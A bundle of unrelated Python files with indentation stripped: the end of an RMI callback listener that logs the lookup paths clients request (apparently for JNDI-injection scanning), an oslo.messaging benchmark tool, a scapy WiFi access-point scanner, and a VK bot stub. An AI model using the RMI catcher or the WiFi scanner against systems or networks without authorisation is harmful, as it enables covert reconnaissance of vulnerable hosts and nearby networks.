send_data = b"\x4e"
send_data += struct.pack(">h", len(address[0]))
send_data += address[0].encode()
send_data += b"\x00\x00"
send_data += struct.pack(">H", address[1])
client.send(send_data)
total=3 #防止socket的recv接收数据不完整
buf1=b""
while total:
buf1 += client.recv(512)
if len(buf1)>50:
break
if buf1:
path = bytearray(buf1).split(b"\xdf\x74")[-1][2:].decode(errors="ignore")
print("data:{}".format(buf1))
print("client:{} send path:{}".format(address, path))
except Exception as ex:
print('run rmi error:{}'.format(ex))
finally:
client.close()
def main():
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ip_port = (listenip, listenport)
sock.bind(ip_port)
sock.listen(max_conn)
print("listen: {}:{} maxconnect:{}".format(listenip, listenport, max_conn))
while True:
client, address = sock.accept()
thread = threading.Thread(target=rmi_response, args=(client, address))
thread.setDaemon(True)
thread.start()
if __name__ == '__main__':
max_conn = 200
listenip = "0.0.0.0"
listenport = 20008
main()
|
__init__.py
|
#
# Copyright (C) 2017 Kenneth A. Giusti
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
import abc
import json
import logging
import math
import os
import socket
import threading
import time
from time import time as now
try:
import Queue as queue
except ImportError:
import queue
import oslo_messaging as om
import uuid
__all__ = [
"RPCTestClient",
"RPCTestServer",
"TestNotifier",
"TestListener",
"Controller"
]
# the types of oslo.messaging clients
RPC_CLIENT = 'RPCClient'
RPC_SERVER = 'RPCServer'
LISTENER = 'Listener'
NOTIFIER = 'Notifier'
MESSAGING_CLIENT_TYPES = [RPC_CLIENT, RPC_SERVER, LISTENER, NOTIFIER]
# addressing for control messages
CONTROL_EXCHANGE = 'ombt-control'
CONTROLLER_TOPIC = 'controller-%s'
CLIENT_TOPIC = "client-%s-%s" # client-$type-$topic
# addressing for RPC tests
RPC_EXCHANGE = 'ombt-rpc-test'
RPC_TOPIC = "rpc-%s"
# addressing for Notification tests
NOTIFY_EXCHANGE = 'ombt-notify-test'
NOTIFY_TOPIC = "notify-%s"
def _wait_stabilize(delay, count_fn):
# helper to wait until a counter has stabilized for delay seconds
count = count_fn()
timeout = delay
while timeout > 0:
time.sleep(1.0)
new_count = count_fn()
if count != new_count:
# reset
count = new_count
timeout = delay
else:
timeout -= 1
class Stats(object):
"""Manage a single statistic"""
def __init__(self, min=None, max=None, total=0, count=0,
sum_of_squares=0, distribution=None):
self.min = min
self.max = max
self.total = total
self.count = count
self.sum_of_squares = sum_of_squares
# distribution of values grouped by powers of 10
self.distribution = distribution or dict()
@classmethod
def from_dict(cls, values):
if 'distribution' in values:
# hack alert!
# when a Stats is passed via an RPC call it appears as if the
# distribution map's keys are converted from int to str.
# Fix that by re-indexing the distribution map:
new_dict = dict()
old_dict = values['distribution']
for k in old_dict.keys():
new_dict[int(k)] = old_dict[k]
values['distribution'] = new_dict
return Stats(**values)
def to_dict(self):
new_dict = dict()
for a in ["min", "max", "total", "count", "sum_of_squares"]:
new_dict[a] = getattr(self, a)
new_dict["distribution"] = self.distribution.copy()
return new_dict
def update(self, value):
self.total += value
self.count += 1
self.sum_of_squares += value**2
self.min = min(self.min, value) if self.min else value
self.max = max(self.max, value) if self.max else value
log = int(math.log10(value)) if value >= 1.0 else 0
base = 10**log
index = int(value / base) # 0..9
if log not in self.distribution:
self.distribution[log] = [0 for i in range(10)]
self.distribution[log][index] += 1
def reset(self):
self.__init__()
def average(self):
return (self.total / float(self.count)) if self.count else 0
def std_deviation(self):
return math.sqrt((self.sum_of_squares / float(self.count)) -
(self.average() ** 2)) if self.count else -1
def merge(self, stats):
if stats.min is not None and self.min is not None:
self.min = min(self.min, stats.min)
else:
self.min = self.min or stats.min
if stats.max is not None and self.max is not None:
self.max = max(self.max, stats.max)
else:
self.max = self.max or stats.max
self.total += stats.total
self.count += stats.count
self.sum_of_squares += stats.sum_of_squares
for k in stats.distribution.keys():
if k in self.distribution:
self.distribution[k] = [z for z in map(lambda a, b: a + b,
stats.distribution[k],
self.distribution[k])]
else:
self.distribution[k] = stats.distribution[k]
def __str__(self):
return "min=%i, max=%i, avg=%f, std-dev=%f" % (self.min, self.max,
self.average(),
self.std_deviation())
def print_distribution(self):
keys = list(self.distribution.keys())
keys.sort()
for order in keys:
row = self.distribution[order]
# order=0, index=0 is special case as it is < 1.0, for all orders >
# 0, index 0 is ignored since everthing < 10^order is accounted for
# in index 9 of the (order - 1) row
index = 0 if order == 0 else 1
while index < len(row):
print("[%d..<%d): %d" %
((10 ** int(order)) * index,
(10 ** int(order)) * (index + 1),
row[index]))
index += 1
class NullOutputter(object):
""" Output handler used if no output is desired
"""
def write(self, msg):
pass
class FileOutputter(object):
"""Output handler used for sending output to a file
"""
def __init__(self, filepath):
self._fobj = open(filepath, 'w', -1)
def write(self, msg):
self._fobj.write(msg)
class TestResults(object):
"""Client results of a test run.
"""
def __init__(self, start_time=None, stop_time=None, latency=None,
msgs_ok=0, msgs_fail=0, errors=None):
super(TestResults, self).__init__()
self.start_time = start_time
self.stop_time = stop_time
self.latency = latency or Stats()
self.msgs_ok = msgs_ok # count of successful msg transfers
self.msgs_fail = msgs_fail # count of failed msg transfers
self.errors = errors or dict() # error msgs and counts
@classmethod
def from_dict(cls, values):
if 'latency' in values:
values['latency'] = Stats.from_dict(values['latency'])
if 'errors' in values:
values['errors'] = values['errors'].copy()
return TestResults(**values)
def to_dict(self):
new_dict = dict()
for a in ['start_time', 'stop_time', 'msgs_ok', 'msgs_fail']:
new_dict[a] = getattr(self, a)
new_dict['latency'] = self.latency.to_dict()
new_dict['errors'] = self.errors.copy()
return new_dict
def error(self, reason):
key = str(reason)
self.errors[key] = self.errors.get(key, 0) + 1
def reset(self):
self.__init__()
def merge(self, results):
self.start_time = (min(self.start_time, results.start_time)
if self.start_time and results.start_time
else (self.start_time or results.start_time))
self.stop_time = (max(self.stop_time, results.stop_time)
if self.stop_time and results.stop_time
else (self.stop_time or results.stop_time))
self.msgs_ok += results.msgs_ok
self.msgs_fail += results.msgs_fail
self.latency.merge(results.latency)
for err in results.errors:
self.errors[err] = self.errors.get(err, 0) + results.errors[err]
def print_results(self):
if self.msgs_fail:
print("Error: %d message transfers failed"
% self.msgs_fail)
if self.errors:
print("Error: errors detected:")
for err in self.errors:
print(" '%s' (occurred %d times)" % (err, self.errors[err]))
total = self.msgs_ok + self.msgs_fail
print("Total Messages: %d" % total)
delta_time = self.stop_time - self.start_time
print("Test Interval: %f - %f (%f secs)" % (self.start_time,
self.stop_time,
delta_time))
if delta_time > 0.0:
print("Aggregate throughput: %f msgs/sec" %
(float(total) / delta_time))
latency = self.latency
if latency.count:
print("Latency %d samples (msecs): Average %f StdDev %f"
" Min %f Max %f"
% (latency.count,
latency.average(), latency.std_deviation(),
latency.min, latency.max))
print("Latency Distribution: ")
latency.print_distribution()
class _Base(object):
"""Common base for all ombt2 processes. Establishes a connection to the
control message bus and a subscription for control messages
"""
def __init__(self, cfg, ctl_url, topic, output, name, unique=False,
kind=None, timeout=None):
super(_Base, self).__init__()
self._finished = threading.Event()
self._timeout = timeout
if kind is None:
ctl_topic = CONTROLLER_TOPIC % (topic
if not unique else 'singleton')
self.kind = "Controller"
else:
ctl_topic = CLIENT_TOPIC % ((kind, topic)
if not unique else (kind, 'singleton'))
self.kind = kind
self.name = name or 'ombt-%s-%s-%s-%s-%s' % (topic,
kind,
socket.gethostname(),
os.getpid(),
uuid.uuid4().hex)
self.ctl_url = ctl_url
self.ctl_tport = om.get_rpc_transport(cfg.CONF,
url=ctl_url)
# My address and subscription for receiving control commands/responses
self.ctl_target = om.Target(exchange=CONTROL_EXCHANGE,
topic=ctl_topic,
server=self.name)
self._ctl_server = om.get_rpc_server(self.ctl_tport,
target=self.ctl_target,
endpoints=[self],
executor="threading")
self._ctl_server.start()
if output is not None:
try:
self._output = FileOutputter(output)
except Exception as exc:
logging.error("Cannot open output file %s: %s!",
output, str(exc))
self._output = NullOutputter()
else:
self._output = NullOutputter()
def start(self):
# blocks until connection to the control bus is active
ready = False
attempts = 0
logging.debug("%s connecting to the control message bus...", self.name)
# call my "self_ready" method until it returns successfully.
# this indicates the connection to the control bus is active.
client = om.RPCClient(self.ctl_tport,
target=self.ctl_target,
timeout=2)
while not ready and attempts < 25:
try:
ready = client.call({}, 'self_ready')
except om.MessagingTimeout:
attempts += 1
if not ready:
raise Exception("Unable to contact message bus")
logging.debug("%s is listening", self.name)
def wait(self, timeout=None):
# blocks until client completes shutdown
return self._finished.wait(timeout)
def _do_shutdown(self):
self._ctl_server.stop()
self._ctl_server.wait()
self._finished.set()
logging.debug("%s has shut down", self.name)
#
# RPC calls:
#
def shutdown(self, ctxt):
# cannot synchronously shutdown server since this call is dispatched by
# the server...
threading.Thread(target=self._do_shutdown).start()
def self_ready(self, ctxt):
# simple ping to determine when message bus is connected
return True
class _Client(_Base):
"""Common base for non-controller clients. Defines RPC calls that are
invoked by the Controller to control the tests.
"""
def __init__(self, cfg, ctl_url, topic, kind, timeout, name,
unique=False, output=None):
# listen on 'client-$topic' for controller commands:
super(_Client, self).__init__(cfg, ctl_url, topic, output, name,
unique, kind, timeout)
self.topic = CLIENT_TOPIC % ((kind, topic)
if not unique else (kind, 'singleton'))
self.results = TestResults()
self._results_lock = threading.Lock()
self._output.write('{"client-name": "%(client)s",'
' "kind": "%(kind)s"}\n'
% {'client': self.name,
'kind': kind})
#
# RPC Calls
#
def client_ping(self, ctxt, reply_addr):
# invoked by controller via rpc-cast to roll-call available clients
logging.debug("Client ping received (%s)", self.name)
target = om.Target(**reply_addr)
ctrl = om.RPCClient(self.ctl_tport, target=target,
timeout=self._timeout)
try:
ctrl.call({}, "client_pong", kind=self.kind, name=self.name)
except Exception as exc:
err = str(exc)
logging.error("client pong call failed: %s", err)
self.error(err)
else:
logging.debug("Client pong sent (%s) (%s)", self.name, target)
class _TestClient(_Client):
"""Base class for Notifier and RPC clients
"""
def __init__(self, cfg, ctl_url, topic, kind, name, timeout, unique=False,
output=None):
super(_TestClient, self).__init__(cfg, ctl_url, topic, kind, timeout,
name, unique, output)
# helper to execute func(timestamp) count times, pausing pause seconds
# between invocation. Provides extra logging if verbose
def _execute(self, func, count=0, pause=0, verbose=False):
stop = False
msgid = uuid.uuid4().hex
seq = 0
self.results.start_time = now()
while not stop:
err = None
ts = now()
try:
func(ts, "%s:%d" % (msgid, seq))
except Exception as exc:
self.results.msgs_fail += 1
err = str(exc)
self.results.error(err)
logging.error("Test client failed to send message: %s", err)
else:
self.results.msgs_ok += 1
done = now()
self.results.latency.update((done - ts) * 1000)
self._output.write('{"id": "%(msgid)s", "start": %(start)f,'
' "stop": %(stop)f%(error)s}\n'
% {'msgid': "%s:%d" % (msgid, seq),
'start': ts,
'stop': done,
'error':
(', "error": "%s"' % err) if err else ""
}
)
seq += 1
if pause:
time.sleep(pause)
if count and self.results.latency.count >= count:
stop = True
self.results.stop_time = now()
#
# RPC Calls
#
@abc.abstractmethod
def run_test(self, ctxt, test, kwargs, reply_addr):
"""Called by the controller to have the client run test 'test' with
arguments kwargs. When the test completes the client sends the results
to the controller at 'reply_addr' by calling its 'client_result'
method. Note: this is an RPC method that is invoked by the test
controller via a fanout 'cast' - not 'call' (the controller does not
block for results)
"""
class _TestServer(_Client):
"""Base class for Listener and RPC servers
"""
def __init__(self, cfg, ctl_url, topic, kind, name, timeout, unique=False,
output=None):
super(_TestServer, self).__init__(cfg, ctl_url, topic, kind, timeout,
name, unique, output)
#
# Controller RPC Calls
#
def get_server_results(self, ctxt, reply_addr):
"""Called by the controller to gather server side test data. May be
called repeatedly until the test completes. Note this is invoked by
the controller via a fanout 'cast' - not a 'call' (the controller does
not block for results)
"""
with self._results_lock:
results = self.results.to_dict()
self.results.reset()
controller = om.RPCClient(self.ctl_tport,
om.Target(**reply_addr),
timeout=self._timeout)
try:
controller.call({}, 'client_result', name=self.name,
kind=self.kind, results=results)
except Exception as exc:
# I don't think recovery is possible as the call may be in-doubt.
# For now simply let folks know the results may be invalid
err = str(exc)
logging.error("%s failed to report results!"
" Test results may be invalid!"
" Error: %s", err)
else:
logging.debug("Server %s test results sent", self.name)
class RPCTestClient(_TestClient):
"""Runs the RPC tests against the RPCTestServer
"""
def __init__(self, cfg, ctl_url, test_url, topic, name, timeout,
unique=False, output=None):
super(RPCTestClient, self).__init__(cfg, ctl_url, topic, RPC_CLIENT,
name, timeout, unique, output)
# for calling the test RPC server(s):
target = om.Target(exchange=RPC_EXCHANGE,
topic=RPC_TOPIC % topic)
fanout_target = om.Target(exchange=RPC_EXCHANGE,
topic=RPC_TOPIC % topic,
fanout=True)
tport = (self.ctl_tport
if test_url == self.ctl_url
else om.get_rpc_transport(cfg.CONF, url=test_url))
self._rpc_client = om.RPCClient(tport,
target=target,
timeout=timeout)
self._fanout_client = om.RPCClient(tport,
target=fanout_target,
timeout=timeout)
#
# RPC Calls:
#
def run_test(self, ctxt, test, kwargs, reply_addr):
func = None
verbose = kwargs.get("verbose", False)
pause = kwargs.get("pause", 0)
data = kwargs.get("data", "")
count = kwargs.get("count", 0)
if test == "test_call":
func = lambda ts, msgid: self._rpc_client.call({}, 'echo',
data=data,
timestamp=ts,
msgid=msgid)
elif test == "test_cast":
func = lambda ts, msgid: self._rpc_client.cast({}, 'noop',
data=data,
timestamp=ts,
msgid=msgid)
elif test == "test_fanout":
func = lambda ts, msgid: self._fanout_client.cast({}, 'noop',
data=data,
timestamp=ts,
msgid=msgid)
else:
logging.error("Client %s ignoring unknown test %s",
self.name, test)
return
self._output.write('{"test-name": "%(name)s",'
' "test-start": %(start)f}\n'
% {'name': test, 'start': now()})
controller = om.RPCClient(self.ctl_tport,
om.Target(**reply_addr),
timeout=self._timeout)
logging.debug("Client %s starting test %s ...", self.name, test)
# Before running the test, try to ping the server. This will force a
# link setup so the first latency-timed message will not be blocked
# waiting for the setup to complete.
try:
self._rpc_client.call({}, "self_ready")
except Exception as exc:
logging.warning("Client %s is unable to reach RPC server: %s",
self.name, str(exc))
self.results.error(str(exc))
# keep going, perhaps the test will not fail...
self._execute(func, count, pause, verbose)
self._output.write('{"test-end": %f}\n' % now())
logging.debug("Client %s test %s finished, sending results...",
self.name, test)
try:
controller.call({}, 'client_result', name=self.name,
kind=self.kind, results=self.results.to_dict())
except Exception as exc:
# I don't think recovery is possible as the call may be in-doubt.
# For now simply let folks know the results may be invalid
logging.error("%s failed to report results!"
" Test results may be invalid!"
" Error: %s", RPC_CLIENT, str(exc))
else:
logging.debug("Client %s test %s results sent", self.name, test)
self.results.reset()
class RPCTestServer(_TestServer):
"""Response to RPC requests from RPCTestClient
"""
def __init__(self, cfg, ctl_url, test_url, topic, executor, name, timeout,
unique=False, output=None):
super(RPCTestServer, self).__init__(cfg, ctl_url, topic, RPC_SERVER,
name, timeout, unique, output)
target = om.Target(exchange=RPC_EXCHANGE,
topic=RPC_TOPIC % topic,
server=self.name)
tport = (self.ctl_tport
if test_url == self.ctl_url
else om.get_rpc_transport(cfg.CONF, url=test_url))
self._rpc_server = om.get_rpc_server(tport,
target,
[self],
executor=executor)
self._rpc_server.start()
def _update_stats(self, timestamp, msgid):
# given timestamp from arriving message
ts = now()
self._output.write('{"id": "%s", "start": %f, "recv": %f'
% (msgid, timestamp, ts))
if timestamp > ts:
logging.error("Clock error detected:"
" send time (%f) after arrival time (%f)"
" test results will be invalid!",
timestamp, ts)
with self._results_lock:
self.results.error("Clocks not synchronized")
self.results.msgs_fail += 1
self._output.write(', "error": "unsynchronized clocks"\n')
else:
with self._results_lock:
self.results.start_time = (min(self.results.start_time, ts)
if self.results.start_time else ts)
self.results.stop_time = (max(self.results.stop_time, ts)
if self.results.stop_time else ts)
self.results.msgs_ok += 1
self.results.latency.update((ts - timestamp) * 1000)
self._output.write('}\n')
#
# Controller RPC Calls:
#
def shutdown(self, ctxt):
self._rpc_server.stop()
self._rpc_server.wait()
super(RPCTestServer, self).shutdown(ctxt)
#
# Test RPC Calls:
#
def noop(self, ctxt, data, timestamp, msgid):
# for cast testing - called by RPCTestClient, no return value
self._update_stats(timestamp, msgid)
logging.debug("RPCServer.noop(timestamp=%s)", timestamp)
def echo(self, ctxt, data, timestamp, msgid):
# for call testing - called by RPCTestClient
self._update_stats(timestamp, msgid)
logging.debug("RPCServer.echo(timestamp=%s)", timestamp)
return data
class TestNotifier(_TestClient):
"""Client for issuing Notification calls to the TestListener
"""
def __init__(self, cfg, ctl_url, test_url, topic, name, timeout,
output=None):
super(TestNotifier, self).__init__(cfg,
ctl_url,
topic,
NOTIFIER,
name,
timeout,
output)
# for notifying the test listener:
om.set_transport_defaults(control_exchange=NOTIFY_EXCHANGE)
tport = om.get_notification_transport(cfg.CONF, url=test_url)
topic = NOTIFY_TOPIC % topic
self._notifier = om.notify.notifier.Notifier(tport,
self.name,
driver='messaging',
topics=[topic])
#
# RPC Calls:
#
def run_test(self, ctxt, test, kwargs, reply_addr):
if test != 'test_notify':
# ignore other tests, like rpc-call, etc
return
verbose = kwargs.get("verbose", False)
pause = kwargs.get("pause", 0)
data = kwargs.get("data", "")
count = kwargs.get("count", 0)
severity = kwargs.get("severity", "debug")
controller = om.RPCClient(self.ctl_tport,
om.Target(**reply_addr),
timeout=self._timeout)
logging.debug("Client %s starting test %s ...", self.name, test)
func = getattr(self._notifier, severity)
payload = {'payload': data}
def test_func(timestamp, msgid):
payload['timestamp'] = timestamp
payload['msgid'] = msgid
func({}, "notification-test", payload)
self._output.write('{"test-name": "test_notify",'
' "test-start": %(start)f}\n'
% {'start': now()})
self._execute(test_func, count, pause, verbose)
self._output.write('{"test-end": %f}\n' % now())
logging.debug("Client %s test %s finished, sending results...",
self.name, test)
with self._results_lock:
results = self.results.to_dict()
self.results.reset()
try:
controller.call({}, 'client_result', name=self.name,
kind=self.kind, results=results)
except Exception as exc:
# I don't think recovery is possible as the call may be in-doubt.
# For now simply let folks know the results may be invalid
logging.error("%s failed to report results!"
" Test results may be invalid!"
" Error: %s", str(exc))
else:
logging.debug("Client %s test %s results sent", self.name, test)
class TestListener(_TestServer):
def __init__(self, cfg, ctl_url, test_url, topic, executor, name, timeout,
pool=None, output=None):
super(TestListener, self).__init__(cfg,
ctl_url,
topic,
LISTENER,
name,
timeout, output)
target = om.Target(exchange=NOTIFY_EXCHANGE,
topic=NOTIFY_TOPIC % topic,
server=self.name)
om.set_transport_defaults(control_exchange=NOTIFY_EXCHANGE)
tport = om.get_notification_transport(cfg.CONF, url=test_url)
self._listener = om.get_notification_listener(tport,
[target],
[self],
executor=executor,
pool=pool)
self._listener.start()
#
# Controller RPC Calls:
#
def shutdown(self, ctxt):
self._listener.stop()
self._listener.wait()
super(TestListener, self).shutdown(ctxt)
#
# Notifications:
#
def _report(self, severity, ctx, publisher, event_type, payload, metadata):
ts = now()
logging.debug("%s Notification %s:%s:%s:%s:%s", self.name, severity,
publisher, event_type, payload, metadata)
timestamp = payload['timestamp']
msgid = payload['msgid']
self._output.write('{"id": "%(msgid)s", "start": %(start)f,'
' "recv": %(recv)f'
% {'msgid': msgid, 'start': timestamp, 'recv': ts})
if timestamp > ts:
logging.error("Clock error detected:"
" send time (%f) after arrival time (%f)"
" test results will be invalid!",
timestamp, ts)
with self._results_lock:
self.results.error("Clocks not synchronized")
self.results.msgs_fail += 1
self._output.write(', "error": "unsynchronized clocks"\n')
else:
with self._results_lock:
self.results.start_time = (min(self.results.start_time, ts)
if self.results.start_time else ts)
self.results.stop_time = (max(self.results.stop_time, ts)
if self.results.stop_time else ts)
self.results.latency.update((ts - timestamp) * 1000)
self.results.msgs_ok += 1
self._output.write('}\n')
def debug(self, ctx, publisher, event_type, payload, metadata):
self._report("debug", ctx, publisher, event_type, payload, metadata)
def audit(self, ctx, publisher, event_type, payload, metadata):
self._report("audit", ctx, publisher, event_type, payload, metadata)
def critical(self, ctx, publisher, event_type, payload, metadata):
self._report("critical", ctx, publisher, event_type, payload, metadata)
def error(self, ctx, publisher, event_type, payload, metadata):
self._report("error", ctx, publisher, event_type, payload, metadata)
def info(self, ctx, publisher, event_type, payload, metadata):
self._report("info", ctx, publisher, event_type, payload, metadata)
def warn(self, ctx, publisher, event_type, payload, metadata):
self._report("warn", ctx, publisher, event_type, payload, metadata)
class Controller(_Base):
"""The test controller
"""
def __init__(self, cfg, ctl_url, topic, timeout, unique=False, idle=2,
output=None):
# each controller has a unique topic not to be confused
# with future or past controller instances
self.topic = topic
self._idle = idle
self.unique = unique
super(Controller, self).__init__(cfg, ctl_url, topic, output,
unique=False,
name=None,
kind=None,
timeout=timeout)
self._total_minions = 0
self._queue = queue.Queue()
# count of clients per type
self._minions = dict([(k, 0) for k in MESSAGING_CLIENT_TYPES])
# aggregated client results per type
self._results = dict([(k, TestResults())
for k in MESSAGING_CLIENT_TYPES])
# control rpc client for each type:
self._clients = dict()
def start(self):
super(Controller, self).start()
logging.debug("Polling for clients...")
reply = {'exchange': self.ctl_target.exchange,
'topic': self.ctl_target.topic,
'server': self.ctl_target.server}
for kind in MESSAGING_CLIENT_TYPES:
target = om.Target(exchange=CONTROL_EXCHANGE,
topic=CLIENT_TOPIC %
((kind, self.topic)
if not self.unique else (kind, 'singleton')),
fanout=True)
self._clients[kind] = om.RPCClient(self.ctl_tport, target=target)
self._clients[kind].cast({}, 'client_ping', reply_addr=reply)
# wait until no more clients reply to the ping
# (things are idle)
_wait_stabilize(self._idle, lambda: self._total_minions)
def shutdown(self):
"""Shutdown this Controller
"""
super(Controller, self).shutdown({})
self.wait()
def shutdown_clients(self):
"""Shutdown all clients listening to $topic
"""
for kind in MESSAGING_CLIENT_TYPES:
self._clients[kind].cast({}, 'shutdown')
time.sleep(1.0)
def run_call_test(self, count, data, verbose, pause):
clients = self._minions[RPC_CLIENT]
servers = self._minions[RPC_SERVER]
kwargs = {'verbose': verbose,
'pause': pause,
'data': data,
'count': count}
self._run_test(RPC_CLIENT, 'test_call', kwargs)
# note: set the poll time to 2x the client's pause between calls,
# otherwise we're polling too frequently
self._query_servers(RPC_SERVER, pause * 2, count * clients)
print("RPC call test results")
print("%d RPC clients, %d RPC Servers (%d total)"
% (clients, servers, clients + servers))
print("\n")
print("Aggregated RPC Client results:")
print("------------------------------")
self._results[RPC_CLIENT].print_results()
print("\n")
print("Aggregated RPC Server results:")
print("------------------------------")
self._results[RPC_SERVER].print_results()
def run_cast_test(self, count, data, verbose, pause, delay):
clients = self._minions[RPC_CLIENT]
servers = self._minions[RPC_SERVER]
kwargs = {'verbose': verbose,
'pause': pause,
'data': data,
'count': count}
self._run_test(RPC_CLIENT, 'test_cast', kwargs)
# cast are async, wait a bit for msgs to propagate
time.sleep(delay)
# note: set the poll time to 2x the client's pause between calls,
# otherwise we're polling too frequently
self._query_servers(RPC_SERVER, pause * 2, count * clients)
print("RPC cast test results")
print("%d RPC clients, %d RPC Servers (%d total)"
% (clients, servers, clients + servers))
print("\n")
print("Aggregated RPC Client results:")
print("------------------------------")
self._results[RPC_CLIENT].print_results()
print("\n")
print("Aggregated RPC Server results:")
print("------------------------------")
self._results[RPC_SERVER].print_results()
def run_fanout_test(self, count, data, verbose, pause,
delay):
clients = self._minions[RPC_CLIENT]
servers = self._minions[RPC_SERVER]
kwargs = {'verbose': verbose,
'pause': pause,
'data': data,
'count': count}
self._run_test(RPC_CLIENT, 'test_fanout', kwargs)
# fanouts are async, wait a bit for msgs to propagate
time.sleep(delay)
# note: set the poll time to 2x the client's pause between calls,
# otherwise we're polling too frequently
self._query_servers(RPC_SERVER, pause * 2,
count * clients * servers)
print("RPC fanout test results")
print("%d RPC clients, %d RPC Servers (%d total)"
% (clients, servers, clients + servers))
print("\n")
print("Aggregated RPC Client results:")
print("------------------------------")
self._results[RPC_CLIENT].print_results()
print("\n")
print("Aggregated RPC Server results:")
print("------------------------------")
self._results[RPC_SERVER].print_results()
start = self._results[RPC_CLIENT].start_time
stop = self._results[RPC_SERVER].stop_time
print("\n")
print("Fanout propagation delay:")
print("-------------------------")
print(" First client transmit time: %f" % start)
print(" Last server receive time: %f" % stop)
print(" Duration (secs): %f" % (stop - start))
def run_notification_test(self, count, data, severity, verbose, pause,
delay):
clients = self._minions[NOTIFIER]
servers = self._minions[LISTENER]
kwargs = {'verbose': verbose,
'pause': pause,
'data': data,
'count': count,
'severity': severity}
self._run_test(NOTIFIER, 'test_notify', kwargs)
# notifications are async, wait a bit for msgs to propagate
time.sleep(delay)
# note: set the poll time to 2x the client's pause between calls,
# otherwise we're polling too frequently
self._query_servers(LISTENER, pause * 2, count * clients)
print("Notification test results")
print("%d Notifiers, %d Listeners (%d total)"
% (clients, servers, clients + servers))
print("\n")
print("Aggregated Notifier (Client) results:")
print("------------------------------------")
self._results[NOTIFIER].print_results()
print("\n")
print("Aggregated Listener (Server) results:")
print("-------------------------------------")
self._results[LISTENER].print_results()
def _run_test(self, kind, test, kwargs):
"""Tell the messaging clients to run a test. When the client completes
it will call the 'client_result' method below.
"""
count = self._minions[kind]
if count == 0:
raise Exception("No %s clients visible" % kind)
reply = {'exchange': self.ctl_target.exchange,
'topic': self.ctl_target.topic,
'server': self.ctl_target.server}
# tell 'kind' clients to run the test
self._clients[kind].cast({}, 'run_test',
test=test,
kwargs=kwargs,
reply_addr=reply)
results_per_client = dict()
# wait for the clients to send results
while count:
try:
name, ckind, results = self._queue.get(timeout=self._timeout)
except queue.Empty:
raise Exception("%s test timed out: no response from clients!"
% test)
results_per_client[name] = results.to_dict()
self._results[ckind].merge(results)
if ckind == kind:
count -= 1
else:
# TODO(kgiusti) uh, is this a problem?
logging.warning("Huh? results from %s while expecting a %s",
ckind, kind)
self._output.write(json.dumps(results_per_client) + '\n')
def _query_servers(self, kind, pause, total):
"""Ask the servers for any data gathered during the test. The servers
will respond by calling the 'client_result' method below. Once the
servers stop reporting new statistics the query is done.
:param kind: the type of server to query - RPC or LISTENER
:type kind: str
:param pause: time in seconds to wait between each server poll. Should
be at least twice the client's inter-message pause time.
:type pause: float
:param total: total number of messages expected to be received by all
servers
"""
if self._minions[kind] == 0:
raise Exception("No %s servers visible" % kind)
# avoid hammering the servers if no pause given
pause = max(pause, 0.250) if pause else 0.250
server_results = self._results[kind]
reply = {'exchange': self.ctl_target.exchange,
'topic': self.ctl_target.topic,
'server': self.ctl_target.server}
logging.debug("Querying servers...")
results_per_server = dict()
done = False
start = now()
while not done and abs(now() - start) < self._timeout:
# tell 'kind' servers to return results
self._clients[kind].cast({}, 'get_server_results',
reply_addr=reply)
# wait for the servers to send results
count = self._minions[kind]
seen = 0
while count:
try:
_ = self._queue.get(timeout=self._timeout)
name, ckind, results = _
except queue.Empty:
raise Exception("%s test timed out: no response from"
" servers!" % kind)
if ckind != kind:
# TODO(kgiusti): uh, is this a problem?
logging.warning("Huh? results from %s while expecting %s",
ckind, kind)
continue
if name not in results_per_server:
results_per_server[name] = results
else:
results_per_server[name].merge(results)
server_results.merge(results)
seen += results.msgs_ok + results.msgs_fail
count -= 1
# exit loop once the expected number of messages have been received
# by the servers, or the test times out
done = server_results.msgs_ok + server_results.msgs_fail >= total
if not done:
time.sleep(pause)
if seen == 0:
# no replies: try pausing longer next time
pause = min(pause * 2.0, self._timeout)
if not done:
logging.error("Test timed out - not all messages accounted for")
results_per_server = dict([[k, v.to_dict()]
for k, v in results_per_server.items()])
self._output.write(json.dumps(results_per_server) + '\n')
logging.debug("... servers queried")
#
# RPC calls:
#
def client_pong(self, ctxt, kind, name):
# A client 'name' is checking in
if kind not in self._minions:
self._minions[kind] = 0
self._minions[kind] += 1
self._total_minions += 1
logging.debug("New %s detected (%s) - %d total clients found",
kind, name, self._total_minions)
return True
def client_result(self, ctxt, name, kind, results):
# A test client is reporting a test result in response to the above
# _run_test method.
logging.debug("%s results received from %s", (kind, name))
try:
self._queue.put((name, kind, TestResults.from_dict(results)))
except Exception as exc:
logging.error("Invalid TestResult from %s:%s (%s)",
kind, str(exc), str(results))
|
wifi_scanner.py
|
from scapy.all import *
from threading import Thread
import pandas
import time
import os
import sys
# initialize the networks dataframe that will contain all access points nearby
networks = pandas.DataFrame(columns=["BSSID", "SSID", "dBm_Signal", "Channel", "Crypto"])
# set the index BSSID (MAC address of the AP)
networks.set_index("BSSID", inplace=True)
def callback(packet):
if packet.haslayer(Dot11Beacon):
# extract the MAC address of the network
bssid = packet[Dot11].addr2
# get the name of it
ssid = packet[Dot11Elt].info.decode()
try:
dbm_signal = packet.dBm_AntSignal
except:
dbm_signal = "N/A"
# extract network stats
stats = packet[Dot11Beacon].network_stats()
# get the channel of the AP
channel = stats.get("channel")
# get the crypto
crypto = stats.get("crypto")
networks.loc[bssid] = (ssid, dbm_signal, channel, crypto)
def print_all():
while True:
os.system("clear")
print(networks)
time.sleep(0.5)
def change_channel():
ch = 1
while True:
os.system(f"iwconfig {interface} channel {ch}")
# switch channel from 1 to 14 each 0.5s
ch = ch % 14 + 1
time.sleep(0.5)
if __name__ == "__main__":
# interface name, check using iwconfig
interface = sys.argv[1]
# start the thread that prints all the networks
printer = Thread(target=print_all)
printer.daemon = True
printer.start()
# start the channel changer
channel_changer = Thread(target=change_channel)
channel_changer.daemon = True
channel_changer.start()
# start sniffing
sniff(prn=callback, iface=interface)
|
main.py
|
import vk_api
from vk_api import bot_longpoll
import assets.View.MainView as mainView
import threading
import json
token = open('./assets/token.cred').readline().replace('\n', '')
views = []
userIds = []
